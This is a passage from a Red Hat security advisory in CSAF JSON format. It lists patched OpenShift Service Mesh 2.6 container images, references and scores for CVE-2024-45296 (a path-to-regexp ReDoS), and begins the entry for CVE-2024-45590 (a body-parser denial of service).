"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-45296"
},
{
"category": "external",
"summary": "RHBZ#2310908",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2310908"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-45296",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45296"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-45296",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-45296"
},
{
"category": "external",
"summary": "https://github.com/pillarjs/path-to-regexp/commit/29b96b4a1de52824e1ca0f49a701183cc4ed476f",
"url": "https://github.com/pillarjs/path-to-regexp/commit/29b96b4a1de52824e1ca0f49a701183cc4ed476f"
},
{
"category": "external",
"summary": "https://github.com/pillarjs/path-to-regexp/commit/60f2121e9b66b7b622cc01080df0aabda9eedee6",
"url": "https://github.com/pillarjs/path-to-regexp/commit/60f2121e9b66b7b622cc01080df0aabda9eedee6"
},
{
"category": "external",
"summary": "https://github.com/pillarjs/path-to-regexp/security/advisories/GHSA-9wv6-86v2-598j",
"url": "https://github.com/pillarjs/path-to-regexp/security/advisories/GHSA-9wv6-86v2-598j"
}
],
"release_date": "2024-09-09T19:15:13.330000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-07T09:24:48+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:7726"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "path-to-regexp: Backtracking regular expressions cause ReDoS"
},
{
"cve": "CVE-2024-45590",
"cwe": {
"id": "CWE-405",
"name": "Asymmetric Resource Consumption (Amplification)"
},
"discovery_date": "2024-09-10T16:20:29.292154+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2311171"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in body-parser. This vulnerability causes denial of service via a specially crafted payload when the URL encoding is enabled.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "body-parser: Denial of Service Vulnerability in body-parser",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
